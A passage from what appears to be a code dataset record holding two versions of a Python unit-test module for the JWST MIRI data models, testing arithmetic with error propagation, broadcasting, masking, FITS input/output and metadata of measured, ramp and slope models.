self.assertAlmostEqual(newsimple.data.all(), 0.0)\n del newsimple\n result = self.dataproduct + 42\n test1 = self.dataproduct.data + 42\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n del result\n result = self.dataproduct + newdp\n test1 = self.dataproduct.data + newdp.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n expectedsq = self.error[1][0] * self.error[1][0] + b2[1][0] * b2[1][0]\n actualsq = result.err[1, 0] * result.err[1, 0]\n self.assertAlmostEqual(expectedsq, actualsq)\n expectedsq = self.error[2][1] * self.error[2][1] + b2[2][1] * b2[2][1]\n actualsq = result.err[2, 1] * result.err[2, 1]\n self.assertAlmostEqual(expectedsq, actualsq)\n del result\n result = self.dataproduct - 42\n test1 = self.dataproduct.data - 42\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n del result\n result = self.dataproduct - newdp\n test1 = self.dataproduct.data - newdp.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n expectedsq = self.error[1][0] * self.error[1][0] + b2[1][0] * b2[1][0]\n actualsq = result.err[1, 0] * result.err[1, 0]\n self.assertAlmostEqual(expectedsq, actualsq)\n expectedsq = self.error[2][1] * self.error[2][1] + b2[2][1] * b2[2][1]\n actualsq = result.err[2, 1] * result.err[2, 1]\n self.assertAlmostEqual(expectedsq, actualsq)\n del result\n result = self.dataproduct + newdp - newdp\n test1 = self.dataproduct.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n del result\n result = self.dataproduct * 3\n test1 = self.dataproduct.data * 3\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n del result\n result = self.dataproduct * newdp\n test1 = self.dataproduct.data * newdp.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n err1 = self.dataproduct.err\n da1 = self.dataproduct.data\n err2 = newdp.err\n da2 = newdp.data\n expectedErr = np.sqrt(err1 * err1 * da2 * da2 + err2 * err2 * da1 * da1\n )\n self.assertTrue(np.array_equal(expectedErr, result.err))\n del result, da1, da2, err1, err2, expectedErr\n result = self.dataproduct / 3.0\n test1 = self.dataproduct.data / 3.0\n test2 = result.data\n self.assertAlmostEqual(test1.all(), test2.all())\n del test1, test2, result\n self.assertRaises(ValueError, self.dataproduct.__truediv__, 0.0)\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n result = self.dataproduct / newdp\n test1 = self.dataproduct.data / newdp.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n dat = self.dataproduct.data[1][1]\n newdat = newdp.data[1][1]\n resultErr = result.err[1][1]\n dpErr = self.dataproduct.err[1][1]\n newdpErr = newdp.err[1][1]\n expectErr = np.sqrt(dpErr * dpErr / (newdat * newdat) + \n newdpErr * newdpErr * dat * dat / (newdat * newdat * newdat *\n newdat))\n self.assertEqual(expectErr, resultErr)\n del test1, test2, result\n newdp2 = newdp * 2\n newdp3 = newdp * 3\n newdp4 = newdp2 + newdp3\n result = (self.dataproduct - newdp) * newdp2 / newdp3 + newdp4\n del newdp, newdp2, newdp3, newdp4\n del result\n\n def test_broadcasting(self):\n a4x3 = [[90, 80, 70, 60], [50, 40, 30, 20], [10, 0, -10, -20]]\n b4x3 = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]\n a4x1 = [4, 3, 2, 1]\n b4x1 = [1, 2, 1, 2]\n c4x1 = [0, 1, 0, 0]\n c5x1 = [0, 1, 0, 0, 1]\n newdp1 = MiriMeasuredModel(data=a4x3, err=b4x3, dq=c4x1)\n self.assertTrue(np.allclose(a4x3, newdp1.data))\n self.assertTrue(np.allclose(b4x3, newdp1.err))\n self.assertTrue(np.allclose(c4x1, newdp1.dq))\n self.assertRaises(TypeError, MiriMeasuredModel, data=a4x3, error=\n b4x3, quality=c5x1)\n newdp2 = MiriMeasuredModel(data=a4x1, err=b4x1, dq=c4x1)\n result1 = newdp1 + newdp2\n result2 = newdp2 + newdp1\n self.assertEqual(result1.data.shape, result2.data.shape)\n self.assertTrue(np.allclose(result1.data, result2.data))\n self.assertTrue(np.allclose(result1.err, result2.err))\n self.assertTrue(np.allclose(result1.dq, result2.dq))\n result1.save(self.testfile1, overwrite=True)\n result2.save(self.testfile2, overwrite=True)\n del result1, result2\n result1 = newdp1 * newdp2\n result2 = newdp2 * newdp1\n self.assertEqual(result1.data.shape, result2.data.shape)\n self.assertTrue(np.allclose(result1.data, result2.data))\n self.assertTrue(np.allclose(result1.err, result2.err))\n self.assertTrue(np.allclose(result1.dq, result2.dq))\n result1.save(self.testfile1, overwrite=True)\n result2.save(self.testfile2, overwrite=True)\n del result1, result2\n result1 = newdp1 - newdp2\n result2 = newdp2 - newdp1\n self.assertEqual(result1.data.shape, result2.data.shape)\n self.assertTrue(np.allclose(result1.err, result2.err))\n self.assertTrue(np.allclose(result1.dq, result2.dq))\n result1.save(self.testfile1, overwrite=True)\n result2.save(self.testfile2, overwrite=True)\n del result1, result2\n result1 = newdp1 / newdp2\n result2 = newdp2 / newdp1\n self.assertEqual(result1.data.shape, result2.data.shape)\n self.assertTrue(np.allclose(result1.dq, result2.dq))\n result1.save(self.testfile1, overwrite=True)\n result2.save(self.testfile2, overwrite=True)\n del result1, result2\n\n def test_description(self):\n descr = str(self.simpleproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = repr(self.simpleproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = self.simpleproduct.stats()\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = self.dataproduct.stats()\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.data)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.err)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.dq)\n self.assertIsNotNone(descr)\n del descr\n\n\nclass TestMiriRampModel(unittest.TestCase):\n\n def setUp(self):\n self.a1 = [[10, 20, 30, 40], [50, 60, 70, 80], [90, 100, 110, 120]]\n self.c1 = [[1, 0, 0, 0], [0, 1, 0, 1], [1, 0, 1, 0]]\n self.c2 = [[0, 1, 1, 0], [1, 0, 0, 1], [1, 0, 1, 0]]\n self.acube = [self.a1, self.a1, self.a1]\n self.ccube = [self.c1, self.c2, self.c1]\n self.ahyper = [self.acube, self.acube]\n self.chyper = [self.ccube, self.ccube]\n self.refout = np.ones_like(self.chyper)\n self.dataproduct = MiriRampModel(data=self.ahyper, refout=self.\n refout, pixeldq=self.c1, dq_def=pixeldq_flags, groupdq=self.\n chyper, groupdq_def=groupdq_flags)\n self.dataproduct.set_housekeeping_metadata('MIRI EC', 'Joe Bloggs',\n 'V1.0')\n self.dataproduct.set_observation_metadata()\n self.dataproduct.set_target_metadata(0.0, 0.0)\n self.dataproduct.set_instrument_metadata(detector='MIRIFULONG',\n channel='1', ccc_pos='OPEN', deck_temperature=11.0,\n detector_temperature=6.0)\n self.dataproduct.set_exposure_metadata(readpatt='FAST', nints=1,\n ngroups=1, frame_time=1.0, integration_time=10.0, group_time=\n 10.0, reset_time=0, frame_resets=3)\n self.testfile = 'MiriRampModel_test.fits'\n\n def tearDown(self):\n del self.a1, self.c1, self.c2\n del self.acube, self.ccube\n del self.ahyper, self.chyper\n del self.dataproduct\n if os.path.isfile(self.testfile):\n try:\n os.remove(self.testfile)\n except Exception as e:\n strg = ('Could not remove temporary file, ' + self.testfile +\n '\\n ' + str(e))\n warnings.warn(strg)\n\n def test_creation(self):\n b1 = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]\n bcube = [b1, b1, b1]\n bhyper = [bcube, bcube]\n newdp1 = MiriRampModel(data=self.ahyper)\n self.assertIsNotNone(newdp1.data)\n self.assertGreater(len(newdp1.data), 0)\n self.assertIsNotNone(newdp1.pixeldq)\n self.assertTrue(newdp1.pixeldq.ndim == 2)\n self.assertIsNotNone(newdp1.groupdq)\n self.assertTrue(newdp1.groupdq.ndim == 4)\n self.assertEqual(np.mean(newdp1.groupdq), 0)\n descr1 = str(newdp1)\n del newdp1, descr1\n newdp3 = MiriRampModel(data=self.ahyper, pixeldq=self.c1, groupdq=\n self.chyper)\n self.assertIsNotNone(newdp3.data)\n self.assertGreater(len(newdp3.data), 0)\n self.assertIsNotNone(newdp3.pixeldq)\n self.assertTrue(newdp3.pixeldq.ndim == 2)\n self.assertNotEqual(np.mean(newdp3.pixeldq), 0)\n self.assertIsNotNone(newdp3.groupdq)\n self.assertTrue(newdp3.groupdq.ndim == 4)\n self.assertNotEqual(np.mean(newdp3.groupdq), 0)\n descr3 = str(newdp3)\n del newdp3, descr3\n newdp4 = MiriRampModel(data=self.ahyper, pixeldq=self.c1)\n self.assertIsNotNone(newdp4.data)\n self.assertGreater(len(newdp4.data), 0)\n self.assertIsNotNone(newdp4.pixeldq)\n self.assertTrue(newdp4.pixeldq.ndim == 2)\n self.assertNotEqual(np.mean(newdp4.pixeldq), 0)\n self.assertIsNotNone(newdp4.groupdq)\n self.assertTrue(newdp4.groupdq.ndim == 4)\n descr4 = str(newdp4)\n del newdp4, descr4\n newdp5 = MiriRampModel(data=self.ahyper, groupdq=self.chyper)\n self.assertIsNotNone(newdp5.data)\n self.assertGreater(len(newdp5.data), 0)\n self.assertIsNotNone(newdp5.pixeldq)\n self.assertTrue(newdp5.pixeldq.ndim == 2)\n self.assertIsNotNone(newdp5.groupdq)\n self.assertTrue(newdp5.groupdq.ndim == 4)\n self.assertNotEqual(np.mean(newdp5.groupdq), 0)\n descr5 = str(newdp5)\n del newdp5, descr5\n emptydp = MiriRampModel((2, 2, 2, 2))\n self.assertIsNotNone(emptydp.data)\n self.assertEqual(emptydp.data.shape, (2, 2, 2, 2))\n self.assertIsNotNone(emptydp.pixeldq)\n self.assertIsNotNone(emptydp.groupdq)\n self.assertEqual(emptydp.groupdq.shape, (2, 2, 2, 2))\n descr = str(emptydp)\n self.assertIsNotNone(descr)\n del emptydp, descr\n nulldp = MiriRampModel()\n descr1 = str(nulldp)\n self.assertIsNotNone(descr1)\n nulldp.data = np.asarray(self.ahyper)\n self.assertIsNotNone(nulldp.pixeldq)\n self.assertIsNotNone(nulldp.groupdq)\n descr2 = str(nulldp)\n self.assertIsNotNone(descr2)\n del nulldp, descr1, descr2\n a1d = [10, 20, 30, 40]\n c1d = [1, 0, 0, 0]\n self.assertRaises(ValueError, MiriRampModel, data=a1d, pixeldq=c1d)\n a2d = [[10, 20, 30, 40], [50, 60, 70, 80], [90, 100, 110, 120]]\n c2d = [[1, 0, 0, 0], [0, 1, 0, 1], [1, 0, 1, 0]]\n self.assertRaises(ValueError, MiriRampModel, data=a2d, groupdq=c2d)\n a3d = [a2d, a2d, a2d]\n c3d = [c2d, c2d, c2d]\n self.assertRaises(ValueError, MiriRampModel, data=a3d, pixeldq=c3d)\n self.assertRaises(ValueError, MiriRampModel, data=a3d, groupdq=c3d)\n self.assertRaises(ValueError, MiriRampModel, data=self.ahyper,\n pixeldq=self.ccube)\n self.assertRaises(ValueError, MiriRampModel, data=self.ahyper,\n groupdq=self.c1)\n\n def test_masking(self):\n self.assertIsNotNone(self.dataproduct.dq)\n mask1 = MiriRampModel(data=self.ahyper, pixeldq=self.c1, groupdq=\n self.chyper, maskwith='pixeldq')\n self.assertIsNotNone(mask1.pixeldq)\n self.assertGreater(len(mask1.pixeldq), 0)\n self.assertIsNotNone(mask1.dq)\n self.assertGreater(len(mask1.dq), 0)\n self.assertEqual(mask1.dq.shape, mask1.pixeldq.shape)\n self.assertTrue(np.all(mask1.dq == mask1.pixeldq))\n del mask1\n mask2 = MiriRampModel(data=self.ahyper, pixeldq=self.c1, groupdq=\n self.chyper, maskwith='groupdq')\n self.assertIsNotNone(mask2.groupdq)\n self.assertGreater(len(mask2.groupdq), 0)\n self.assertIsNotNone(mask2.dq)\n self.assertGreater(len(mask2.dq), 0)\n self.assertEqual(mask2.dq.shape, mask2.groupdq.shape)\n self.assertTrue(np.all(mask2.dq == mask2.groupdq))\n del mask2\n mask3 = MiriRampModel(data=self.ahyper, pixeldq=self.c1, groupdq=\n self.chyper, maskwith='both')\n self.assertIsNotNone(mask3.pixeldq)\n self.assertGreater(len(mask3.pixeldq), 0)\n self.assertIsNotNone(mask3.groupdq)\n self.assertGreater(len(mask3.groupdq), 0)\n self.assertIsNotNone(mask3.dq)\n self.assertGreater(len(mask3.dq), 0)\n self.assertEqual(mask3.dq.shape, mask3.groupdq.shape)\n expected = mask3.groupdq | mask3.pixeldq\n self.assertTrue(np.all(mask3.dq == expected))\n del mask3\n\n def test_arithmetic(self):\n testdp = MiriRampModel(data=self.ahyper, pixeldq=self.c1, groupdq=\n self.chyper, maskwith='both')\n descr = str(testdp)\n self.assertIsNotNone(descr)\n del descr\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n double = testdp * 2.0\n self.assertIsNotNone(double.data)\n self.assertGreater(len(double.data), 0)\n expected = double.data * 2.0\n self.assertTrue(np.all(double.data - expected < 0.001))\n descr = str(double)\n self.assertIsNotNone(descr)\n del descr\n warnings.simplefilter('ignore')\n result = self.dataproduct + testdp\n self.assertIsNotNone(result.data)\n self.assertGreater(len(result.data), 0)\n self.assertIsNotNone(result.dq)\n self.assertGreater(len(result.dq), 0)\n descr = str(result)\n self.assertIsNotNone(descr)\n del descr\n\n def test_fitsio(self):\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n self.dataproduct.save(self.testfile, overwrite=True)\n with MiriRampModel(self.testfile) as readback:\n assert_products_equal(self, self.dataproduct, readback,\n arrays=['data', 'refout', 'pixeldq', 'groupdq'], tables\n =['pixeldq_def', 'groupdq_def'])\n del readback\n\n def test_description(self):\n descr = str(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = repr(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = self.dataproduct.stats()\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.data)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.refout)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.dq)\n self.assertIsNotNone(descr)\n del descr\n\n\nclass TestMiriSlopeModel(unittest.TestCase):\n\n def setUp(self):\n a1 = [[10, 20, 30, 40], [50, 60, 70, 80], [90, 100, 110, 120]]\n b1 = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]\n c1 = [[1, 0, 0, 0], [0, 1, 0, 1], [1, 0, 1, 0]]\n acube = [a1, a1, a1]\n bcube = [b1, b1, b1]\n ccube = [c1, c1, c1]\n dcube = [a1, b1, a1]\n self.dataproduct = MiriSlopeModel(data=acube, err=bcube, dq=ccube,\n dq_def=master_flags, zeropt=dcube, fiterr=dcube)\n self.dataproduct.set_housekeeping_metadata('MIRI EC', 'Joe Bloggs',\n 'V1.0')\n self.dataproduct.set_observation_metadata()\n self.dataproduct.set_target_metadata(0.0, 0.0)\n self.dataproduct.set_instrument_metadata(detector='MIRIMAGE', filt=\n 'F2550W', ccc_pos='OPEN', deck_temperature=11.0,\n detector_temperature=6.0)\n self.dataproduct.set_exposure_metadata(readpatt='SLOW', nints=3,\n ngroups=10, frame_time=1.0, integration_time=100.0, group_time=\n 1000.0, reset_time=0, frame_resets=3)\n self.testfile = 'MiriSlopeModel_test.fits'\n\n def tearDown(self):\n del self.dataproduct\n if os.path.isfile(self.testfile):\n try:\n os.remove(self.testfile)\n except Exception as e:\n strg = ('Could not remove temporary file, ' + self.testfile +\n '\\n ' + str(e))\n warnings.warn(strg)\n\n def test_creation(self):\n a1d = [10, 20, 30, 40]\n b1d = [1, 2, 3, 4]\n c1d = [1, 0, 0, 0]\n self.assertRaises(ValueError, MiriSlopeModel, data=a1d, err=b1d, dq=c1d\n )\n a2d = [a1d, a1d, a1d]\n b2d = [b1d, b1d, b1d]\n c2d = [c1d, c1d, c1d]\n self.assertRaises(ValueError, MiriSlopeModel, data=a2d, err=b2d, dq=c2d\n )\n a3d = [a2d, a2d]\n b3d = [b2d, b2d]\n c3d = [c2d, c2d]\n a4d = [a3d, a3d]\n b4d = [b3d, b3d]\n c4d = [c3d, c3d]\n self.assertRaises(ValueError, MiriSlopeModel, data=a4d, err=b4d, dq=c4d\n )\n\n def test_copy(self):\n datacopy = self.dataproduct.copy()\n self.assertIsNotNone(datacopy)\n assert_products_equal(self, self.dataproduct, datacopy, arrays=[\n 'data', 'err', 'dq', 'nreads', 'readsat', 'ngoodseg', 'zeropt',\n 'fiterr'], tables='dq_def')\n del datacopy\n\n def test_fitsio(self):\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n self.dataproduct.save(self.testfile, overwrite=True)\n with MiriSlopeModel(self.testfile) as readback:\n assert_products_equal(self, self.dataproduct, readback,\n arrays=['data', 'err', 'dq', 'nreads', 'readsat',\n 'ngoodseg', 'zeropt', 'fiterr'], tables='dq_def')\n del readback\n\n def test_description(self):\n descr = str(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = repr(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = self.dataproduct.stats()\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.data)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.dq)\n self.assertIsNotNone(descr)\n del descr\n\n\n<mask token>\n",
"step-5": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n\"\"\"\n\nModule test_measured_model - Contains the unit tests for the classes\nin the datamodels.miri_measured_model module.\n\n:History:\n\n15 Jan 2013: Created.\n21 Jan 2013: Warning messages controlled with Python warnings module.\n05 Feb 2013: File closing problem solved by using \"with\" context manager.\n08 Feb 2013: Replaced 'to_fits' with more generic 'save' method.\n23 Apr 2013: Modified to keep up with behaviour of jwst_lib model.\n Uninitialised arrays now have the same size and shape as the\n data array but are full of default values.\n26 Apr 2013: File closing problem has returned!\n13 May 2013: Added MiriSlopeModel to describe MIRI slope data\n (which is different from \"ImageModel\" data because it\n preserves integrations). N.B. FINAL MODEL IS TBD.\n04 Jun 2013: Shortened the names of the ramp, slope and image models.\n10 Jun 2013: Added more metadata tests.\n02 Jul 2013: MiriCubeModel added.\n29 Jul 2013: stats() method added.\n14 Aug 2013: Updated ramp model test to include groupdq and pixeldq\n02 Sep 2013: Compare numpy record arrays in a way that it independent\n of the byte ordering.\n12 Sep 2013: Swapped the MRS CHANNEL and BAND keywords.\n12 Sep 2013: Test that the data product can be copied successfully.\n04 Oct 2013: Changed default field_def table to use MIRI reserved flags.\n07 Oct 2013: GROUP_DEF table added to MIRI ramp data. Test MiriRampModel\n for masking and arithmetic operations.\n24 Feb 2014: Instrument name (INSTRUME) changed from meta.instrument.type to\n meta.instrument.name.\n27 Feb 2014: Added extra data arrays to MiriSlopeModel test.\n04 Mar 2014: Added set_housekeeping_metadata.\n25 Jun 2014: field_def and group_def changed to dq_def and groupdq_def.\n field_def for ramp data changed to pixeldq_def.\n21 Jul 2014: IM, and LW detectors changed to MIRIMAGE and MIRIFULONG.\n25 Sep 2014: Updated the reference flags. insert_value_column function\n used to convert between 3 column and 4 column flag tables.\n TYPE and REFTYPE are no longer identical.\n07 Nov 2014: The data model now raises an IOError when an invalid file\n path is provided.\n11 Mar 2015: group_integration_time changed to group_time.\n11 Jun 2015: Added a history record test.\n09 Jul 2015: Reference output array (refout) added to MiriRampModel schema.\n19 Aug 2015: Removed MiriImageModel and MiriCubeModel.\n07 Oct 2015: Made exception catching Python 3 compatible.\n08 Apr 2016: Removed obsolete FIXME statements.\n04 May 2016: ERR array removed from ramp data model.\n31 Aug 2016: Change exception detected when creating a data model with an\n invalid initialiser.\n15 Jun 2017: Observation and target metadata is appropriate for ramp and\n slope data only.\n12 Jul 2017: Replaced \"clobber\" parameter with \"overwrite\".\n13 Sep 2017: Updated \"not a file name\" test to match the new behaviour of\n JWST pipeline version 0.7.8rc2\n27 Apr 2018: Corrected bug in get_history() length test.\n27 Jun 2018: Removed unused arrays.\n15 Feb 2018: Check that the DQ_DEF table has the correct fieldnames.\n\n@author: Steven Beard (UKATC)\n\n\"\"\"\n\nimport os\nimport unittest\nimport warnings\n\nimport numpy as np\n\n# Import the JWST master data quality flag definitions\nfrom miri.datamodels.dqflags import master_flags, pixeldq_flags, \\\n groupdq_flags\n\nfrom miri.datamodels.miri_measured_model import MiriMeasuredModel, \\\n MiriRampModel, MiriSlopeModel\nfrom miri.datamodels.tests.util import assert_recarray_equal, \\\n assert_products_equal\n\n\nclass TestMiriMeasuredModel(unittest.TestCase):\n \n # Test the MiriMeasuredModel class\n\n def setUp(self):\n # Create a 64x64 simple MiriMeasuredModel object, with no error\n # or quality arrays.\n self.data = np.linspace(0.0, 100000.0, 64*64)\n self.data.shape = [64,64]\n self.simpleproduct = MiriMeasuredModel(data=self.data)\n # Add some example metadata.\n self.simpleproduct.set_housekeeping_metadata('MIRI EC', 'Joe Bloggs',\n 'V1.0')\n self.simpleproduct.set_instrument_metadata(detector='MIRIMAGE',\n filt='F560W',\n ccc_pos='OPEN',\n deck_temperature=10.0,\n detector_temperature=7.0)\n self.simpleproduct.set_exposure_metadata(readpatt='SLOW',\n nints=1, ngroups=10,\n frame_time=30.0,\n integration_time=30.0,\n group_time=300.0,\n reset_time=0, frame_resets=3)\n \n # Create a more complex MiriMeasuredModel object from primary,\n # error and quality arrays.\n self.primary = [[10,20,30,40], [50,60,70,80], [90,100,110,120]]\n self.error = [[1,2,3,4], [5,6,7,8], [9,10,11,12]]\n self.quality = [[1,0,0,0], [0,1,0,1], [1,0,1,0]]\n self.dataproduct = MiriMeasuredModel(data=self.primary,\n err=self.error,\n dq=self.quality,\n dq_def=master_flags)\n # Add some example metadata.\n self.dataproduct.set_instrument_metadata(detector='MIRIFUSHORT',\n channel='1',\n ccc_pos='OPEN',\n deck_temperature=11.0,\n detector_temperature=6.0)\n self.dataproduct.set_exposure_metadata(readpatt='FAST',\n nints=1, ngroups=1,\n frame_time=1.0,\n integration_time=10.0,\n group_time=10.0,\n reset_time=0, frame_resets=3)\n\n self.testfile1 = \"MiriMeasuredModel_test1.fits\"\n self.testfile2 = \"MiriMeasuredModel_test2.fits\"\n self.tempfiles = [self.testfile1, self.testfile2]\n \n def tearDown(self):\n # Tidy up\n del self.dataproduct\n del self.primary, self.error, self.quality\n del self.simpleproduct\n del self.data\n # Remove temporary files, if they exist and if able to.\n for tempfile in self.tempfiles: \n if os.path.isfile(tempfile):\n try:\n os.remove(tempfile)\n except Exception as e:\n strg = \"Could not remove temporary file, \" + tempfile + \\\n \"\\n \" + str(e)\n warnings.warn(strg)\n del self.tempfiles\n \n def test_creation(self):\n # Check that the DQ_DEF field names in the class variable are the same\n # as the ones declared in the schema.\n dq_def_names = list(MiriMeasuredModel.dq_def_names)\n schema_names = list(self.dataproduct.get_field_names('dq_def'))\n self.assertEqual(dq_def_names, schema_names,\n \"'dq_def_names' class variable does not match schema\")\n\n # Test that the error and quality arrays are optional.\n a2 = [[10,20,30,40], [50,60,70,80], [90,100,110,120]]\n b2 = [[1,2,3,4], [5,6,7,8], [9,10,11,12]]\n c2 = [[1,0,0,0], [0,1,0,1], [1,0,1,0]]\n \n # 1) Data array only. Data array must exist and be non-empty.\n # Other arrays should exist and be the same size and shape as the\n # data array. They should be full of default values.\n newdp1 = MiriMeasuredModel(data=a2)\n self.assertIsNotNone(newdp1.data)\n self.assertGreater(len(newdp1.data), 0)\n self.assertIsNotNone(newdp1.err)\n self.assertEqual(newdp1.err.shape, newdp1.data.shape)\n # Assumes default is 0.0 - see schema\n self.assertAlmostEqual(np.mean(newdp1.err), 0.0)\n self.assertIsNotNone(newdp1.dq)\n self.assertEqual(newdp1.dq.shape, newdp1.dq.shape)\n # Assumes default is 0 - see schema\n self.assertEqual(np.mean(newdp1.dq), 0)\n descr1 = str(newdp1)\n self.assertIsNotNone(descr1)\n del newdp1, descr1\n \n # 2) Data and error arrays only. Data and error arrays must exist\n # and be non-empty. Quality array should exist but be the same\n # size and shape as the data array. It should be full of default\n # values.\n newdp2 = MiriMeasuredModel(data=a2, err=b2)\n self.assertIsNotNone(newdp2.data)\n self.assertGreater(len(newdp2.data), 0)\n self.assertIsNotNone(newdp2.err)\n self.assertEqual(newdp2.err.shape, newdp2.data.shape)\n # The error array must not be full of default values.\n self.assertNotAlmostEqual(np.mean(newdp2.err), 0.0)\n self.assertIsNotNone(newdp2.dq)\n self.assertEqual(newdp2.dq.shape, newdp2.dq.shape)\n # Assumes default is 0 - see schema\n self.assertEqual(np.mean(newdp2.dq), 0)\n descr2 = str(newdp2)\n self.assertIsNotNone(descr2)\n del newdp2, descr2\n\n # 3) Data, error and quality arrays. All arrays must exist,\n # be non-empty and be the same size and shape.\n newdp3 = MiriMeasuredModel(data=a2, err=b2, dq=c2)\n self.assertIsNotNone(newdp3.data)\n self.assertGreater(len(newdp3.data), 0)\n self.assertIsNotNone(newdp3.err)\n self.assertEqual(newdp3.err.shape, newdp3.data.shape)\n # The error array must not be full of default values.\n self.assertNotAlmostEqual(np.mean(newdp3.err), 0.0)\n self.assertIsNotNone(newdp3.dq)\n self.assertEqual(newdp3.dq.shape, newdp3.dq.shape)\n # The quality array must not be full of default values.\n self.assertNotEqual(np.mean(newdp3.dq), 0)\n descr3 = str(newdp3)\n self.assertIsNotNone(descr3)\n del newdp3, descr3\n \n # It should be possible to set up an empty data product with\n # a specified shape. All three arrays should be initialised to\n # the same shape.\n emptydp = MiriMeasuredModel( (4,4) )\n self.assertIsNotNone(emptydp.data)\n self.assertEqual(emptydp.data.shape, (4,4))\n self.assertIsNotNone(emptydp.err)\n self.assertEqual(emptydp.err.shape, (4,4))\n self.assertIsNotNone(emptydp.dq)\n self.assertEqual(emptydp.dq.shape, (4,4))\n descr = str(emptydp)\n self.assertIsNotNone(descr)\n del emptydp, descr\n \n # A null data product can also be created and populated\n # with data later.\n nulldp = MiriMeasuredModel( )\n descr1 = str(nulldp)\n self.assertIsNotNone(descr1)\n nulldp.data = np.asarray(a2)\n self.assertIsNotNone(nulldp.err)\n self.assertIsNotNone(nulldp.dq)\n descr2 = str(nulldp)\n self.assertIsNotNone(descr2)\n del nulldp, descr1, descr2\n \n # A scalar data product is possible, even if of little use.\n scalardp = MiriMeasuredModel( data=42 )\n self.assertEqual(scalardp.data, 42)\n self.assertIsNotNone(scalardp.err)\n self.assertIsNotNone(scalardp.dq)\n descr = str(scalardp)\n self.assertIsNotNone(descr)\n del scalardp, descr\n \n # Attempts to create a data product from invalid data types\n # and stupid values must be detected.\n # NOTE: A bug in the JWST data model might cause an AttributeError\n # to be raised instead of a ValueError. If this happens, try a newer\n # version of the JWST data model library.\n self.assertRaises(ValueError, MiriMeasuredModel, init=[])\n self.assertRaises(ValueError, MiriMeasuredModel, init=42)\n self.assertRaises(ValueError, MiriMeasuredModel, init='not a file name')\n self.assertRaises(IOError, MiriMeasuredModel, init='nosuchfile.fits')\n #self.assertRaises(ValueError, MiriMeasuredModel, init='')\n self.assertRaises(ValueError, MiriMeasuredModel, data='badstring')\n\n def test_metadata(self):\n # Check the dataproducts contain metadata\n # First test the basic STScI FITS keyword lookup method.\n kwstrg = self.simpleproduct.find_fits_keyword('TELESCOP',\n return_result=True)\n self.assertIsNotNone(kwstrg)\n # kwstrg is a list - assume the first entry is what we want.\n telname = self.simpleproduct[kwstrg[0]]\n self.assertEqual(telname, 'JWST')\n # Accessing the tree structure directly should also work.\n telname = self.simpleproduct.meta.telescope\n self.assertEqual(telname, 'JWST')\n # An alternative lookup provided by the MIRI data model.\n telname = self.simpleproduct.get_fits_keyword('TELESCOP')\n self.assertEqual(telname, 'JWST')\n \n kwstrg = self.simpleproduct.find_fits_keyword('INSTRUME',\n return_result=True)\n self.assertIsNotNone(kwstrg)\n insname = self.simpleproduct[kwstrg[0]]\n self.assertEqual(insname, 'MIRI')\n insname = self.simpleproduct.meta.instrument.name\n self.assertEqual(insname, 'MIRI')\n insname = self.simpleproduct.get_fits_keyword('INSTRUME')\n self.assertEqual(insname, 'MIRI')\n \n # Add some history records and check they exist.\n self.simpleproduct.add_history('History 1')\n self.simpleproduct.add_history('History 2')\n self.simpleproduct.add_history('History 3')\n self.assertGreaterEqual(len(self.simpleproduct.get_history()), 3)\n strg = self.simpleproduct.get_history_str()\n self.assertIsNotNone(strg)\n self.assertGreater(len(strg), 0)\n \n def test_content(self):\n # The data, err and dq attributes are aliases for the primary,\n # error and quality arrays\n self.assertTrue( np.allclose(self.primary, self.dataproduct.data) )\n self.assertTrue( np.allclose(self.error, self.dataproduct.err) )\n self.assertTrue( np.allclose(self.quality, self.dataproduct.dq) )\n\n def test_copy(self):\n # Test that a copy can be made of the data product.\n datacopy = self.dataproduct.copy()\n self.assertIsNotNone(datacopy)\n assert_products_equal( self, self.dataproduct, datacopy,\n arrays=['data', 'err', 'dq'],\n tables='dq_def' )\n del datacopy\n\n def test_fitsio(self):\n # Suppress metadata warnings\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n \n # Check that the data products can be written to a FITS\n # file and read back again without changing the data.\n self.simpleproduct.save(self.testfile1, overwrite=True)\n with MiriMeasuredModel(self.testfile1) as readback:\n self.assertTrue( np.allclose(self.simpleproduct.data,\n readback.data) )\n del readback\n\n self.dataproduct.save(self.testfile2, overwrite=True)\n with MiriMeasuredModel(self.testfile2) as readback:\n assert_products_equal( self, self.dataproduct, readback,\n arrays=['data', 'err', 'dq'],\n tables='dq_def' )\n del readback\n\n def test_asciiio(self):\n # Check that the data products can be written to an ASCII\n # file and read back again without changing the data.\n # TODO: At the moment jwst_lib only supports FITS I/O\n pass\n# # Suppress metadata warnings\n# with warnings.catch_warnings():\n# warnings.simplefilter(\"ignore\")\n# 